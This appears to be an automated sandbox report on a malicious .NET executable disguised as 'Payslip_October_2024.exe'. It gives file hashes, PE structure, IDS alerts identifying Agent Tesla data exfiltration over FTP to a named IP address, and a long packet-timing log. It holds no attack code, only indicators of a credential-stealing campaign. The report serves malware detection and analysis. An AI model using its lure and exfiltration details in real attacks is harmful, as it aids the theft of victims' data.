                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                          Process:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):800256
                                                                                                          Entropy (8bit):7.728157439911338
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:hM3ZJZEkrV/BUNWGlWblcCSU+gXsT3Srkezl4VQRv7P9vZPqWeQh:eL5yWEWbl5LcT36zuVm7lvZPVh
                                                                                                          MD5:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          SHA1:6F63137C9A20C05C04B53EAEA60EAE9355022A97
                                                                                                          SHA-256:7602098A6B2A95CA014488CE7C67B273A6189D7CC4DAA09FB639C32FC21AFA99
                                                                                                          SHA-512:62EFF8465B244C5550DB674C7F49E0EDDE9F127816A735D331F53CA8988631629C9BFE9366742F121FA40B45C1928E3B80B6F0077B2604F636CBF5BA38BBE4AB
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 32%
                                                                                                          Reputation:low
                                                                                                          Process:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):26
                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                          Malicious:true
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):7.728157439911338
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          File name:Payslip_October_2024.exe
                                                                                                          File size:800'256 bytes
                                                                                                          MD5:a0dadb7997e2b13144275b1c164f1c84
                                                                                                          SHA1:6f63137c9a20c05c04b53eaea60eae9355022a97
                                                                                                          SHA256:7602098a6b2a95ca014488ce7c67b273a6189d7cc4daa09fb639c32fc21afa99
                                                                                                          SHA512:62eff8465b244c5550db674c7f49e0edde9f127816a735d331f53ca8988631629c9bfe9366742f121fa40b45c1928e3b80b6f0077b2604f636cbf5ba38bbe4ab
                                                                                                          SSDEEP:12288:hM3ZJZEkrV/BUNWGlWblcCSU+gXsT3Srkezl4VQRv7P9vZPqWeQh:eL5yWEWbl5LcT36zuVm7lvZPVh
                                                                                                          TLSH:F505DFD03B36B719DE695A74D659DDB582F11AA8B101FAE31ADC3B53388C3219E0CF42
                                                                                                          Icon Hash:26ccd9ddd9dddda0
                                                                                                          Entrypoint:0x4c44ea
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x6728E5A9 [Mon Nov 4 15:18:01 2024 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc4498 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc6000 | 0xba0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc24f0 | 0xc2600 | 90e11eb56940eae5925d8612f07fcde5 | False | 0.8751444433279743 | data | 7.734734914632359 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc6000 | 0xba0 | 0xc00 | 283aa62e151331db0322a689c7ae8750 | False | 0.4641927083333333 | data | 5.918595339968432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc8000 | 0xc | 0x200 | 5377fd2afd5411ef46a5727c22edd3a8 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc60c8 | 0x7c3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.5123301459486663
RT_GROUP_ICON | 0xc689c | 0x14 | data | | | 1.05
RT_VERSION | 0xc68c0 | 0x2da | data | | | 0.4506849315068493
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-04T21:25:12.909275+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49742 | TCP
2024-11-04T21:25:13.322096+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49741 | 110.4.45.197 | 21 | TCP
2024-11-04T21:25:14.233376+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49746 | 110.4.45.197 | 52210 | TCP
2024-11-04T21:25:14.238674+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49746 | 110.4.45.197 | 52210 | TCP
2024-11-04T21:25:22.350303+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49751 | 110.4.45.197 | 21 | TCP
2024-11-04T21:25:23.295388+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49752 | 110.4.45.197 | 54816 | TCP
2024-11-04T21:25:23.301069+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49752 | 110.4.45.197 | 54816 | TCP
2024-11-04T21:25:52.030022+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49755 | TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 4, 2024 21:25:03.163824081 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:03.212147951 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:08.294945002 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.295022011 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.295094013 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.298239946 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.298276901 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.912060976 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.912182093 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.913573027 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:08.913599014 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.913880110 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:08.966228962 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:09.007354021 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:09.145492077 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:09.145559072 CET44349740104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:09.146796942 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:09.149893045 CET49740443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:10.244138002 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:10.250215054 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:10.250303984 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:11.196496010 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.206302881 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:11.211330891 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.551081896 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.551650047 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:11.558927059 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.926958084 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:11.927092075 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:11.931963921 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.271320105 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.271470070 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:12.276504993 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.627825975 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.628004074 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:12.632769108 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.971760988 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:12.971892118 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:12.976646900 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:13.316006899 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:13.316637993 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:13.321974039 CET5221049746110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:13.322031021 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:13.322096109 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:13.327677965 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.233009100 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.233376026 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:14.233419895 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:14.238198042 CET5221049746110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.238617897 CET5221049746110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.238673925 CET4974652210192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:14.273894072 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:14.812055111 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.813723087 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:14.813807011 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.089061975 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.093981981 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:15.433594942 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:15.433974028 CET4974864457192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.439146996 CET6445749748110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:15.439227104 CET4974864457192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.439353943 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:15.444212914 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:16.548047066 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:16.548079014 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:16.548146963 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:16.551259041 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:16.551273108 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.385520935 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.385582924 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.385644913 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.385813951 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.385921001 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.386035919 CET2149741110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.386354923 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.483439922 CET4974121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.483498096 CET4974864457192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:17.985162020 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:17.985272884 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.071252108 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.071279049 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.071614981 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.117788076 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.460254908 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.507337093 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.643800974 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.643872023 CET44349750104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:25:18.644088030 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:18.648585081 CET49750443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:25:19.230648041 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:19.235605955 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:19.235682011 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:20.177556992 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.180557966 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:20.187156916 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.532474995 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.536825895 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:20.541747093 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.914602041 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:20.914763927 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:20.919826984 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.268820047 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.269021988 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:21.274319887 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.639569998 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.639883041 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:21.644867897 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.991764069 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:21.992010117 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:21.996855974 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:22.344014883 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:22.344866037 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:22.350110054 CET5481649752110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:22.350241899 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:22.350302935 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:22.355935097 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.295093060 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.295387983 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.295429945 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.300520897 CET5481649752110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.301002979 CET5481649752110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.301069021 CET4975254816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.336467028 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.654500961 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:23.678637981 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:23.683963060 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.031280041 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.031840086 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.037142992 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.037254095 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.037296057 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.042269945 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.978235006 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.978447914 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.978449106 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:24.983552933 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.983616114 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.983632088 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.984672070 CET5944049753110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:24.984729052 CET4975359440192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.023899078 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.331723928 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:25.332184076 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.337414980 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:25.686129093 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:25.686661959 CET4975457287192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.692924976 CET5728749754110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:25.693010092 CET4975457287192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.693078041 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:25.698853016 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:26.639322042 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:26.639621973 CET4975457287192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:26.645237923 CET5728749754110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:26.645299911 CET4975457287192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:26.680185080 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:26.984440088 CET2149751110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:27.039566040 CET4975121192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:27.785145044 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:27.790132999 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:27.859034061 CET4993321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:27.864330053 CET2149933110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:27.864409924 CET4993321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.960189104 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.960237026 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.960258961 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.960514069 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.961163044 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.964343071 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.964363098 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.964493036 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.965082884 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.965092897 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.966165066 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.966214895 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:53.088542938 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:53.722090960 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:53.792846918 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.060810089 CET5002721192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.066885948 CET2150027110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.066970110 CET5002721192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.070226908 CET5002721192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.077003002 CET2150027110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.077083111 CET5002721192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.157516956 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.163002968 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.507267952 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.507849932 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.512981892 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.513071060 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.513139009 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.518682957 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.422035933 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.423206091 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428293943 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428347111 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428356886 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428375959 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428385973 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428395033 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428432941 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428440094 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428459883 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428469896 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428484917 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428502083 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428599119 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428713083 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428925037 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.433453083 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433526993 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433540106 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433547974 CET6337050028110.4.45.197192.168.2.4
